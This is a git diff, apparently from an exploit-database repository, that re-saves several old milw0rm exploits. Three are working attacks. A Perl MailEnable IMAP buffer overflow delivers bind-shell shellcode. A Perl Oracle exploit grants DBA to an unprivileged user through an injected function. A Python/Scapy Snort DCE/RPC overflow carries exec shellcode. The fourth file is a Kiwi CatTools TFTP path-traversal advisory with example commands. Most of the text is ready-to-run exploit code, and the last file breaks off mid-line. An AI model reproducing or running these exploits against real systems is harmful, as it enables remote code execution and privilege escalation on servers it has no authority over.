@@ -1,128 +1,128 @@ -#!/usr/bin/perl -# -# maildisable-v6.pl -# -# Mail Enable Professional <=v2.35 (win32) remote exploit -# by mu-b - Tue Dec 5 2006 -# -# - Tested on: Mail Enable Professional v2.35 (win32) -# -# Note: timing is quite critical with this!!, so change $send_delay -# if it doesn't work.... -# -######## - -use Getopt::Std; getopts('t:n:', \%arg); -use Socket; - -# metasploit win32 bindshell port 1337 -my $zshell_win32_bind = - "\x33\xc9\x83\xe9\xb0". - "\x81\xc4\xd0\xfd\xff\xff". - "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". - "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". - "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". - "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". - "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". - "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". - "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". - "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". - "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". - "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". - "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". - "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". - "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". - "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". - "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". - "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". - "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". - "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". - "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". - "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". - "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". 
- "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; - -# ff e4 -> jmp %esp -my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 - "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0 - "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061 - "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802 - "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 - "\xef\xbe\xad\xde" # DoS - ); - -&print_header; - -my $target; -my $offset; - -if (defined($arg{'t'})) { $target = $arg{'t'} } -if (defined($arg{'n'})) { $offset = $arg{'n'} } -if (!(defined($target))) { &usage; } -if (!(defined($offset))) { $offset = 0; } -if ($offset > $#offsets) { - print("only ".($#offsets+1)." targets known!!\n"); - exit(1); -} else { - $offset = $offsets[$offset]; -} - -my $imapd_port = 143; -my $send_delay = 1; - -my $NOP = 'A'; -my $START_PAD = 547; -my $SHELL_PAD = 12; - -if (connect_host($target, $imapd_port)) { - print("-> * Connected\n"); - $buf = "A001 LOGIN \{24\}"; - send(SOCKET, $buf."\r\n", 0); - sleep($send_delay); - - print("-> * Sending payload\n"); - - send(SOCKET, "AAAAAAAAAAAAAAAAA\{20\}\r\n", 0); - sleep($send_delay); - - send(SOCKET, "BBBBBBBBBBBBBBBBBB\r\n", 0); - sleep($send_delay); - - $buf = ($NOP x $START_PAD).# padding - $offset. # EIP - ($NOP x $SHELL_PAD). - $zshell_win32_bind. # hellcode - ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind))); - send(SOCKET, $buf, 0); - - print("-> * Successfully sent payload!\n"); - print("-> * nc ".$target." 
1337 for shell...\n"); -} - -sub print_header { - print("MailEnable Pro <=v2.35 remote exploit\n"); - print("by: \n\n"); -} - -sub usage { - print(qq(Usage: $0 -t - - -t : hostname to test - -n : return addy offset number -)); - - exit(1); -} - -sub connect_host { - ($target, $port) = @_; - $iaddr = inet_aton($target) || die("Error: $!\n"); - $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); - $proto = getprotobyname('tcp') || die("Error: $!\n"); - - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); - connect(SOCKET, $paddr) || die("Error: $!\n"); - return(1338); -} - -# milw0rm.com [2007-02-16] +#!/usr/bin/perl +# +# maildisable-v6.pl +# +# Mail Enable Professional <=v2.35 (win32) remote exploit +# by mu-b - Tue Dec 5 2006 +# +# - Tested on: Mail Enable Professional v2.35 (win32) +# +# Note: timing is quite critical with this!!, so change $send_delay +# if it doesn't work.... +# +######## + +use Getopt::Std; getopts('t:n:', \%arg); +use Socket; + +# metasploit win32 bindshell port 1337 +my $zshell_win32_bind = + "\x33\xc9\x83\xe9\xb0". + "\x81\xc4\xd0\xfd\xff\xff". + "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". + "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". + "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". + "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". + "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". + "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". + "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". + "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". + "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". + "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". + "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". + "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". + "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". 
+ "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". + "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". + "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". + "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". + "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". + "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". + "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". + "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". + "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; + +# ff e4 -> jmp %esp +my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 + "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0 + "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061 + "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802 + "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 + "\xef\xbe\xad\xde" # DoS + ); + +&print_header; + +my $target; +my $offset; + +if (defined($arg{'t'})) { $target = $arg{'t'} } +if (defined($arg{'n'})) { $offset = $arg{'n'} } +if (!(defined($target))) { &usage; } +if (!(defined($offset))) { $offset = 0; } +if ($offset > $#offsets) { + print("only ".($#offsets+1)." targets known!!\n"); + exit(1); +} else { + $offset = $offsets[$offset]; +} + +my $imapd_port = 143; +my $send_delay = 1; + +my $NOP = 'A'; +my $START_PAD = 547; +my $SHELL_PAD = 12; + +if (connect_host($target, $imapd_port)) { + print("-> * Connected\n"); + $buf = "A001 LOGIN \{24\}"; + send(SOCKET, $buf."\r\n", 0); + sleep($send_delay); + + print("-> * Sending payload\n"); + + send(SOCKET, "AAAAAAAAAAAAAAAAA\{20\}\r\n", 0); + sleep($send_delay); + + send(SOCKET, "BBBBBBBBBBBBBBBBBB\r\n", 0); + sleep($send_delay); + + $buf = ($NOP x $START_PAD).# padding + $offset. # EIP + ($NOP x $SHELL_PAD). + $zshell_win32_bind. 
# hellcode + ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind))); + send(SOCKET, $buf, 0); + + print("-> * Successfully sent payload!\n"); + print("-> * nc ".$target." 1337 for shell...\n"); +} + +sub print_header { + print("MailEnable Pro <=v2.35 remote exploit\n"); + print("by: \n\n"); +} + +sub usage { + print(qq(Usage: $0 -t + + -t : hostname to test + -n : return addy offset number +)); + + exit(1); +} + +sub connect_host { + ($target, $port) = @_; + $iaddr = inet_aton($target) || die("Error: $!\n"); + $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); + $proto = getprotobyname('tcp') || die("Error: $!\n"); + + socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); + connect(SOCKET, $paddr) || die("Error: $!\n"); + return(1338); +} + +# milw0rm.com [2007-02-16] diff --git a/platforms/windows/remote/3364.pl b/platforms/windows/remote/3364.pl index f55d5eefd..86895e88e 100755 --- a/platforms/windows/remote/3364.pl +++ b/platforms/windows/remote/3364.pl 
@@ -1,116 +1,116 @@ -#!/usr/bin/perl -# -# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/archive/1/396133 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Fri Feb 23 12:44:18 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribe.pl line 91. -# [-] Done! -# -# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist -# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37 -# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " -# BEGIN -# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||BUNKER.own||'''); -# END; -# "] at dbms_cdc_subscribe.pl line 114. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! 
-# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go ...(don't worry about errors)!\n"; -my $sth = $dbh->prepare(qq{ -BEGIN - SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||$user.own||'''); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-23] +#!/usr/bin/perl +# +# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/archive/1/396133 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Fri Feb 23 12:44:18 CET 2007 +# +# Oracle InstantClient (basic + sdk) 
required for DBD::Oracle +# +# +# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribe.pl line 91. +# [-] Done! +# +# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist +# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37 +# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " +# BEGIN +# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||BUNKER.own||'''); +# END; +# "] at dbms_cdc_subscribe.pl line 114. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! 
+# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go ...(don't worry about errors)!\n"; +my $sth = $dbh->prepare(qq{ +BEGIN + SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||$user.own||'''); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-23] diff --git a/platforms/windows/remote/3380.txt b/platforms/windows/remote/3380.txt index 32208b223..714062dad 100755 --- a/platforms/windows/remote/3380.txt +++ b/platforms/windows/remote/3380.txt 
@@ -1,55 +1,55 @@ -Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 -server can lead to information disclosure and remote code execution - -Risk: High - -DISCUSSION - -Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and -GET request which can be used to download/upload any file from/to -server. Default setting allows replacing of existing files. Such -settings lead to probability to replace an executable files and run code -on attacker choice. - -EXAMPLES - -C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt - -Transfer successful: 212 bytes in 1 second, 212 bytes/s - -C:\>type boot.txt - -[boot loader] timeout=30 -default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS - -C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt - -Transfer successful: 212 bytes in 1 second, 212 bytes/s - -C:\>type pttest.txt - -[boot loader] timeout=30 -default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS - -C:\> - -SOLUTION - -Upgrade to CatTools 3.2.9 which is available for download at -http://www.kiwisyslog.com/downloads.php - -CREDITS - -Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) - -DISCLOSURE TIMELINE - -Vulnerability discovered: 11/20/2006 - -Initial vendor contact: 12/08/2006 - -Patch released: 02/13/2007 - -Public disclosure: 02/27/2007 - -# milw0rm.com [2007-02-27] +Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 +server can lead to information disclosure and remote code execution + +Risk: High + +DISCUSSION + +Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and +GET request which can be used to download/upload any file from/to +server. Default setting allows replacing of existing files. Such +settings lead to probability to replace an executable files and run code +on attacker choice. 
+ +EXAMPLES + +C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt + +Transfer successful: 212 bytes in 1 second, 212 bytes/s + +C:\>type boot.txt + +[boot loader] timeout=30 +default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS + +C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt + +Transfer successful: 212 bytes in 1 second, 212 bytes/s + +C:\>type pttest.txt + +[boot loader] timeout=30 +default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS + +C:\> + +SOLUTION + +Upgrade to CatTools 3.2.9 which is available for download at +http://www.kiwisyslog.com/downloads.php + +CREDITS + +Sergey Gordeychik of Positive Technologies (www.ptsecurity.com) + +DISCLOSURE TIMELINE + +Vulnerability discovered: 11/20/2006 + +Initial vendor contact: 12/08/2006 + +Patch released: 02/13/2007 + +Public disclosure: 02/27/2007 + +# milw0rm.com [2007-02-27] diff --git a/platforms/windows/remote/3391.py b/platforms/windows/remote/3391.py index dc45fe9c7..b640c374f 100755 --- a/platforms/windows/remote/3391.py +++ b/platforms/windows/remote/3391.py 
@@ -1,86 +1,86 @@ -#!/usr/bin/python -# -# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version) -# -# Author: Trirat Puttaraksa -# -# http://sf-freedom.blogspot.com -# -###################################################### -# For educational purpose only -# -# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 -# -# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) -# to inject the packet, so you have to install Scapy before use it. -# -####################################################### - -import sys -from scapy import * -from struct import pack -conf.verb = 0 - -# NetBIOS Session Service -payload = "\x00\x00\x02\xab" - -# SMB Header -payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00" -payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" -payload += "\x00\x08\x30\x00" - -# Tree Connect AndX Request -payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00" -payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00" -payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" -payload += "\x3f\x3f\x3f\x3f\x3f\x00" - -# NT Create AndX Request -payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00" -payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00" -payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00" -payload += "\x63\x00\x00\x00" - -# Write AndX Request #1 -payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" -payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee" - -#payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00" -payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00" -payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" -payload += 
"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" -payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" -payload += "\x2b\x10\x48\x60\x02\x00\x00\x00" - -# Write AndX Request #2 -payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" -payload += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee" - -# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com) -payload += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44" - -payload += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" -payload += "\xd1\x80\xf5\x83\xeb\xfc\xe2\xf4\x55\x39\xc4\xf5\xa9\xd1\x0b\xb0" -payload += "\x95\x5a\xfc\xf0\xd1\xd0\x6f\x7e\xe6\xc9\x0b\xaa\x89\xd0\x6b\xbc" -payload += "\x22\xe5\x0b\xf4\x47\xe0\x40\x6c\x05\x55\x40\x81\xae\x10\x4a\xf8" -payload += "\xa8\x13\x6b\x01\x92\x85\xa4\xf1\xdc\x34\x0b\xaa\x8d\xd0\x6b\x93" -payload += "\x22\xdd\xcb\x7e\xf6\xcd\x81\x1e\x22\xcd\x0b\xf4\x42\x58\xdc\xd1" -payload += "\xad\x12\xb1\x35\xcd\x5a\xc0\xc5\x2c\x11\xf8\xf9\x22\x91\x8c\x7e" -payload += "\xd9\xcd\x2d\x7e\xc1\xd9\x6b\xfc\x22\x51\x30\xf5\xa9\xd1\x0b\x9d" -payload += "\x95\x8e\xb1\x03\xc9\x87\x09\x0d\x2a\x11\xfb\xa5\xc1\xaf\x58\x17" -payload += "\xda\xb9\x18\x0b\x23\xdf\xd7\x0a\x4e\xb2\xe1\x99\xca\xff\xe5\x8d" -payload += "\xcc\xd1\x80\xf5" - -payload += "\x90" # padding - -if len(sys.argv) != 2: - print "Usage snort_execute_dcerpc.py " - sys.exit(1) - -target = sys.argv[1] - -p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload -send(p) - -# milw0rm.com [2007-03-01] +#!/usr/bin/python +# +# Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version) +# +# Author: Trirat Puttaraksa +# +# http://sf-freedom.blogspot.com +# +###################################################### +# For educational purpose only +# +# This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 +# +# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) +# to 
inject the packet, so you have to install Scapy before use it. +# +####################################################### + +import sys +from scapy import * +from struct import pack +conf.verb = 0 + +# NetBIOS Session Service +payload = "\x00\x00\x02\xab" + +# SMB Header +payload += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00" +payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" +payload += "\x00\x08\x30\x00" + +# Tree Connect AndX Request +payload += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00" +payload += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00" +payload += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" +payload += "\x3f\x3f\x3f\x3f\x3f\x00" + +# NT Create AndX Request +payload += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00" +payload += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +payload += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00" +payload += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00" +payload += "\x63\x00\x00\x00" + +# Write AndX Request #1 +payload += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" +payload += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee" + +#payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00" +payload += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00" +payload += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" +payload += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" +payload += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00" +payload += "\x2b\x10\x48\x60\x02\x00\x00\x00" + +# Write AndX Request #2 +payload += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80" +payload += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee" + +# 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe 
(metasploit.com) +payload += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44" + +payload += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9" +payload += "\xd1\x80\xf5\x83\xeb\xfc\xe2\xf4\x55\x39\xc4\xf5\xa9\xd1\x0b\xb0" +payload += "\x95\x5a\xfc\xf0\xd1\xd0\x6f\x7e\xe6\xc9\x0b\xaa\x89\xd0\x6b\xbc" +payload += "\x22\xe5\x0b\xf4\x47\xe0\x40\x6c\x05\x55\x40\x81\xae\x10\x4a\xf8" +payload += "\xa8\x13\x6b\x01\x92\x85\xa4\xf1\xdc\x34\x0b\xaa\x8d\xd0\x6b\x93" +payload += "\x22\xdd\xcb\x7e\xf6\xcd\x81\x1e\x22\xcd\x0b\xf4\x42\x58\xdc\xd1" +payload += "\xad\x12\xb1\x35\xcd\x5a\xc0\xc5\x2c\x11\xf8\xf9\x22\x91\x8c\x7e" +payload += "\xd9\xcd\x2d\x7e\xc1\xd9\x6b\xfc\x22\x51\x30\xf5\xa9\xd1\x0b\x9d" +payload += "\x95\x8e\xb1\x03\xc9\x87\x09\x0d\x2a\x11\xfb\xa5\xc1\xaf\x58\x17" +payload += 